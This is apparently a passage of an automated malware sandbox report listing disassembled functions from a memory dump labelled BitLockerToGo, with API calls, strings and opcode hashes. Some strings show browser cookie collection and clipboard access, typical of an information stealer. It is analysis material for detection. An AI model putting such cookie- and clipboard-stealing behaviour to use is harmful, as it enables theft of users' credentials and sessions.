                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: Y[
                                                              • API String ID: 1029625771-2541013558
                                                              • Opcode ID: 1f88b6617a4756d5f9d08a6db147c07de4b2769d373e5b304ebea855df4d63ef
                                                              • Instruction ID: 4cce3bb08da5b8b74cc0ddced50527534a58349fa3f532d0d14fc3539a518d82
                                                              • Opcode Fuzzy Hash: 1f88b6617a4756d5f9d08a6db147c07de4b2769d373e5b304ebea855df4d63ef
                                                              • Instruction Fuzzy Hash: D531EFB050A3419FD308CF14C5A471BFBE2FFD5228F288A0EE4A55B785C3749946CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D2867A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: LJ
                                                              • API String ID: 1029625771-1839849906
                                                              • Opcode ID: 03b4cef53aa3210fb6fe5a68d11a907dc424e05d4e8a5603cdcb865a16b0d4fb
                                                              • Instruction ID: 38e90f2ac428fe128649fbfed505a7c63fb3511a4815cd43a463ea60839c7fcb
                                                              • Opcode Fuzzy Hash: 03b4cef53aa3210fb6fe5a68d11a907dc424e05d4e8a5603cdcb865a16b0d4fb
                                                              • Instruction Fuzzy Hash: D61167B46083429FD318CF11D0A075BBBE2EFC4348F18891DE49687381DB34C906CB8A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D24D8C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02D24DC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: InformationVolume
                                                              • String ID: \
                                                              • API String ID: 2039140958-2967466578
                                                              • Opcode ID: 3dffd09ca7c19716e8961cee48a4c6ecdaf71d5712e6d620e9409887ab8b643b
                                                              • Instruction ID: 99f5663b5fab83c8d92b0120720563f66c006a662328c30d6b2d3f67ccae9f2c
                                                              • Opcode Fuzzy Hash: 3dffd09ca7c19716e8961cee48a4c6ecdaf71d5712e6d620e9409887ab8b643b
                                                              • Instruction Fuzzy Hash: 03F092B6680301BBE728DF10EC62F5637A4A744744F24481DB286FB3C0D6F0BD648A59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D1119F Relevance: 3.1, APIs: 2, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000002B,00000000,00000000,A70BA501), ref: 02D11305
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000002B,00000000,?,?), ref: 02D11D46
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 1753d89517b9da23f4bc100a4674ee9b395608a1bea5a9272163d1bce2ad1037
                                                              • Instruction ID: b1bf9c551c63624ff3493eab30ea0d6bee2e69b438979eedaa0527fbe8dd2dfd
                                                              • Opcode Fuzzy Hash: 1753d89517b9da23f4bc100a4674ee9b395608a1bea5a9272163d1bce2ad1037
                                                              • Instruction Fuzzy Hash: B05177B02007449FDB298F15D8E0B167BB1FF86304F25859DDA9A9F38AD735E805CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D07E70 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02D07EAA
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 02D07ED8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 3e0725b5f78edf35683dd82e8065dff40b0b0ffceeaa76d0dea332da46c2e1bb
                                                              • Instruction ID: 3e06df044f30a51a8b9da50a0b5e893c37383c8db3fa9eddba8f10e295c88da7
                                                              • Opcode Fuzzy Hash: 3e0725b5f78edf35683dd82e8065dff40b0b0ffceeaa76d0dea332da46c2e1bb
                                                              • Instruction Fuzzy Hash: 6601D6729402057BD210AA14CC85F7777ADEB89764F040609BA559B3D1D770BD14CAB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D28DAF Relevance: 1.6, APIs: 1, Instructions: 78memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 02D28E42
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 008c193c6d7aa2eed9e3bc29b6e39aa7727dd1d5bfebf79e7731e41b4df2baee
                                                              • Instruction ID: 044e7cd8ee2681954361371bd946cc60ca7aec094a2c8c84c5e43a5a0c5f25c6
                                                              • Opcode Fuzzy Hash: 008c193c6d7aa2eed9e3bc29b6e39aa7727dd1d5bfebf79e7731e41b4df2baee
                                                              • Instruction Fuzzy Hash: F4118E36A4A7C08FD7134A259C506C0BFB1EF6762470E85D7D4D5CBA63C2299C1ECB21
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D289CD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: d084e11b701623268a7db6d75a651e65e45db10048a96dc98b18080eb83bc65a
                                                              • Instruction ID: 9781671fdbd3dd29186d7e83c692c0ac8739161340a1c7977abffe937ae59ae5
                                                              • Opcode Fuzzy Hash: d084e11b701623268a7db6d75a651e65e45db10048a96dc98b18080eb83bc65a
                                                              • Instruction Fuzzy Hash: B6114471A5C3019FD308CF05E4A071ABBE2EBD5218F248E1DE49567744D774D916CF86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D26AD0 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02D26B71
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 2f4a457d35532c4ce57818fff3891a63a4ab0283c78bf1b2e9b67f9f78b53adb
                                                              • Instruction ID: 7dc424b747fc9896874a09951e9381bcd7f0da12324533fc1771d97e4f6693ab
                                                              • Opcode Fuzzy Hash: 2f4a457d35532c4ce57818fff3891a63a4ab0283c78bf1b2e9b67f9f78b53adb
                                                              • Instruction Fuzzy Hash: E41158B05083419FD708CF05C8A0B6BBBA6EB84328F14891CE8A50B285D730DA15CBC2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D26BC0 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02D26C42
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 9825c720d41d3ac7a8e18eea48bf428a4d6a4004ab2f19f30d65ed516f859d31
                                                              • Instruction ID: 2e43c230841e21e7f9a8f41d62b42d91a39643433a9b67cab8193d2e34a06fbc
                                                              • Opcode Fuzzy Hash: 9825c720d41d3ac7a8e18eea48bf428a4d6a4004ab2f19f30d65ed516f859d31
                                                              • Instruction Fuzzy Hash: 52019CB0148380AFD304DF04D5A4B5BBBE1EB95318F508D1DE4A58B392C7B5D81ADB86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 02D1E8E0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 157clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                              • String ID: 2$@$A$C$F
                                                              • API String ID: 3829817484-361553157
                                                              • Opcode ID: a9d2778133181822cca66dba20762e31cf67e7af0829fc1b9c6be5e16ffe695b
                                                              • Instruction ID: 86ffdc501bc42e55722790f85dfa061c4811c3aee6c0d214a01e2232e76d2358
                                                              • Opcode Fuzzy Hash: a9d2778133181822cca66dba20762e31cf67e7af0829fc1b9c6be5e16ffe695b
                                                              • Instruction Fuzzy Hash: 05615DB4908741DFC721DF39D484716BFE0AB05324F048A99E8DA8FB96D334E845CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D06983 Relevance: 7.8, Strings: 6, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • guc{, xrefs: 02D06BD8
                                                              • w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 02D06C99
                                                              • DttH, xrefs: 02D06B25
                                                              • sb b, xrefs: 02D06BCA
                                                              • `Web, xrefs: 02D06B41
                                                              • crvi, xrefs: 02D06BC3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DttH$`Web$crvi$guc{$sb b$w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                              • API String ID: 0-351321908
                                                              • Opcode ID: 9f83f4bf49e8d49012204a6cdca15af13f87ce9e7978fd03c4fd3a93adfab061
                                                              • Instruction ID: eb92db285df76eb7a41ad863b33b8451b3694ce4e9a8ecf22dcab748f5bea497
                                                              • Opcode Fuzzy Hash: 9f83f4bf49e8d49012204a6cdca15af13f87ce9e7978fd03c4fd3a93adfab061
                                                              • Instruction Fuzzy Hash: B3A18EB0608B418BD325CF29C4D07A3BBE1AF56305F08895DD4D78BBA2D778E855CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D017DE Relevance: 6.2, APIs: 4, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02D018C4
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 02D018F4
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 10743d0a5dad989b2750749fa8ff7a3ec444d30737ddc039e795c219fb117e90
                                                              • Instruction ID: 7e33da95dbcdbddc5ef4e4fa5b93184a2fa08b9ec00f587176e9af4242cda566
                                                              • Opcode Fuzzy Hash: 10743d0a5dad989b2750749fa8ff7a3ec444d30737ddc039e795c219fb117e90
                                                              • Instruction Fuzzy Hash: 7F7116B1900B00AFD725CF24D8C4B63B3F9AB45314F144A1DE69A87791E770F909CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D2CD00 Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ONA@$R-,T$R-,T
                                                              • API String ID: 0-737641570
                                                              • Opcode ID: 98e3b1845b5e9b7f8360b826a6347ba6c7692fdcef601d41a14a35120e84a2b4
                                                              • Instruction ID: 04f7aa0ea6d4eefa86dc99671e3b5b956c2672470aa29531d8bc0816c37f954d
                                                              • Opcode Fuzzy Hash: 98e3b1845b5e9b7f8360b826a6347ba6c7692fdcef601d41a14a35120e84a2b4
                                                              • Instruction Fuzzy Hash: A5A199726143228BC714CE18C49076FB7E2FF98718F29891DE895AB391D335EC19CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF5760 Relevance: 3.4, Strings: 2, Instructions: 855COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$8
                                                              • API String ID: 0-46163386
                                                              • Opcode ID: 762baf9fdd3b50d36f1e7081748e2d901e45eb3f65d12f960c1ffeff520393c9
                                                              • Instruction ID: 6a83b78ad44cff7f93792b229fbf2063c46f7dc32cc48322be0aab536dd05eeb
                                                              • Opcode Fuzzy Hash: 762baf9fdd3b50d36f1e7081748e2d901e45eb3f65d12f960c1ffeff520393c9
                                                              • Instruction Fuzzy Hash: 058268716083419FD7A4CF18C880BAABBE2BFC8354F54891DFA898B391D775D944CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D17B8C Relevance: 3.3, Strings: 2, Instructions: 806COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: HSOB$/Vw
                                                              • API String ID: 2994545307-2403524481
                                                              • Opcode ID: b171818b93e0c151c9d1dd17c80750a691e1290f128c9febeeb37d425df10377
                                                              • Instruction ID: 0a7a2cce9ac3bde7dd05d33d608d0603dbca0873df50bc60b14888cadc960fef
                                                              • Opcode Fuzzy Hash: b171818b93e0c151c9d1dd17c80750a691e1290f128c9febeeb37d425df10377
                                                              • Instruction Fuzzy Hash: 16528E70145B419FE339CF25D4907A7BBE2BF56308F188A5DC4EA8BB96C379A805CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D153B0 Relevance: 1.8, Strings: 1, Instructions: 529COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: 20f0ae947c9de8d60149f01f8b7366f2e0076d1ff3ae9fd79bef99b2a7dd1084
                                                              • Instruction ID: f5b5b92ed0749fe43f55906661c0d0b090c68d9129e146ac1106b8da0eb49fc9
                                                              • Opcode Fuzzy Hash: 20f0ae947c9de8d60149f01f8b7366f2e0076d1ff3ae9fd79bef99b2a7dd1084
                                                              • Instruction Fuzzy Hash: D102EFB5608340AFD714CE24F480B2BB7E6AFC4314F98896DE89587791D739ED09CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D1863B Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HSOB
                                                              • API String ID: 0-4264381521
                                                              • Opcode ID: 5d790471924d3237be1385a50382f06bb6f7eb06e06b97d12e11fa5e9c377e6a
                                                              • Instruction ID: 97e3405b7109ff3fb1b9ba53b757603391b93a8112f26bea9e4d97ae5482aafc
                                                              • Opcode Fuzzy Hash: 5d790471924d3237be1385a50382f06bb6f7eb06e06b97d12e11fa5e9c377e6a
                                                              • Instruction Fuzzy Hash: 61E15970145B419FE325CF35D0A07A3BBE2BF56308F588A5DD4EA4BB96C37AA805CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D18D3B Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HSOB
                                                              • API String ID: 0-4264381521
                                                              • Opcode ID: 5d790471924d3237be1385a50382f06bb6f7eb06e06b97d12e11fa5e9c377e6a
                                                              • Instruction ID: 1c526ef66a16e23fb7c1bf3d073ce3177ad07ba81d463c768de9b978ccbd93bb
                                                              • Opcode Fuzzy Hash: 5d790471924d3237be1385a50382f06bb6f7eb06e06b97d12e11fa5e9c377e6a
                                                              • Instruction Fuzzy Hash: 28E15970145B419FE325CF35D0A07A3BBE2BF56308F588A5DD4EA4BB96C37AA805CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D0727D Relevance: 1.6, Strings: 1, Instructions: 355COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: by
                                                              • API String ID: 0-1674299033
                                                              • Opcode ID: aef1137fbeb0c5ac0e5857939cc4de517aa3f1b3cf7ae2afd7c5217d249d3ce8
                                                              • Instruction ID: 31f6b4d8538aefb1e2a13e774bb094f8f5505008c536fcad2ac1457c6eef65b6
                                                              • Opcode Fuzzy Hash: aef1137fbeb0c5ac0e5857939cc4de517aa3f1b3cf7ae2afd7c5217d249d3ce8
                                                              • Instruction Fuzzy Hash: 22C14575610B008BD7288F28C8A17A7B7F2FF85318F149A1CD5978BB91E775B906CB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D15F13 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: hFt:
                                                              • API String ID: 0-647926978
                                                              • Opcode ID: ea43ffd8880e3839421b65b1217c509a9418c4d6b664bc2a36f3bfedefa55172
                                                              • Instruction ID: 7a944561ee0dce13757e6eef1515d968766e7d09267f590c4a24d6bab36ca08f
                                                              • Opcode Fuzzy Hash: ea43ffd8880e3839421b65b1217c509a9418c4d6b664bc2a36f3bfedefa55172
                                                              • Instruction Fuzzy Hash: 00B12671201B818BD338CB399451767FBE6BF96204F298A5DC4EB8BB81D338E945CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D2C9C0 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ONA@
                                                              • API String ID: 0-126421097
                                                              • Opcode ID: baeb3280573f326fd6bffde631ac0ce667e36fea3dd37b3862607428ddb988bd
                                                              • Instruction ID: 478d980733222e0d4ea66d3fd34ee4f3ecdd9d6d5071f837057366139802dff6
                                                              • Opcode Fuzzy Hash: baeb3280573f326fd6bffde631ac0ce667e36fea3dd37b3862607428ddb988bd
                                                              • Instruction Fuzzy Hash: 2BA186716183129BD724CE28C490B6FB7E2FF94358F16891DE8859B361E770EC49CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF6B00 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,
                                                              • API String ID: 0-3772416878
                                                              • Opcode ID: b589b540072d4ecd545d5a7a5898c68722d8a0c14c3a497ce803925b6980678d
                                                              • Instruction ID: 951cfbb9ee064250763d5f09ea4453e1ed8d17b8556886c8db6018cd2aec91f1
                                                              • Opcode Fuzzy Hash: b589b540072d4ecd545d5a7a5898c68722d8a0c14c3a497ce803925b6980678d
                                                              • Instruction Fuzzy Hash: 7EB158711093819FD354CF68C88075AFBE4AFA9308F544A6DF5D897382C371EA18CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D0A000 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: &%
                                                              • API String ID: 0-3372434844
                                                              • Opcode ID: 0b85a6595600f16e343c55cb75a2aaecbdf1df6bc0cfaa04868ebee61338d548
                                                              • Instruction ID: 19d0b448d5ff730f5ead56127644b44c846c53b3bce725e4f643035b966b72f4
                                                              • Opcode Fuzzy Hash: 0b85a6595600f16e343c55cb75a2aaecbdf1df6bc0cfaa04868ebee61338d548
                                                              • Instruction Fuzzy Hash: 317141B05083409FD324CF29C49075BBBE1FF85758F209A1DE9A99B3A1D374D908CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D163BC Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: kX_c
                                                              • API String ID: 0-1179951471
                                                              • Opcode ID: 533d87587488c4330882c609f1ff06ecdf8077c65272c43bba28370ea5907750
                                                              • Instruction ID: 196ee833ab50afa4f5ff8ba4373620218d174dea1a81ee8f0491493e9f5ee536
                                                              • Opcode Fuzzy Hash: 533d87587488c4330882c609f1ff06ecdf8077c65272c43bba28370ea5907750
                                                              • Instruction Fuzzy Hash: 79514B70106F918ED72ACF34D9A07A7BBE1AF02246F48189CC4EB8B686D735B605CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D16312 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: kX_c
                                                              • API String ID: 0-1179951471
                                                              • Opcode ID: 0afae2454d77b443957dce1dd2230c305ab477af7912d9178664590f9ba7167b
                                                              • Instruction ID: 7bfd22d960277021230af1fe10a66850f745565f864adbba9d336fb4d0044e35
                                                              • Opcode Fuzzy Hash: 0afae2454d77b443957dce1dd2230c305ab477af7912d9178664590f9ba7167b
                                                              • Instruction Fuzzy Hash: 68614A70106F818ED729CF24D9A07A7BBE1AF02246F48199DC4EB8B386D779B605CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D162C8 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: kX_c
                                                              • API String ID: 0-1179951471
                                                              • Opcode ID: d2e957d215e90b192e7c729951d5b6c3424b0d1a2ed6b5bf0776cd03391b75c9
                                                              • Instruction ID: 61541fc45f62e3920b7edcef40cd4c223b92fabbdfcff4efe150638899743313
                                                              • Opcode Fuzzy Hash: d2e957d215e90b192e7c729951d5b6c3424b0d1a2ed6b5bf0776cd03391b75c9
                                                              • Instruction Fuzzy Hash: 2E414770105F818AD72ACF38D9907A7BBE1AF06246F44189CC4EB8B786C735B605CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D14F56 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8
                                                              • API String ID: 0-4194326291
                                                              • Opcode ID: 95b3c9c87028eb14cea58240f0f43c0a9495de390a54595e6c445cfc91740dce
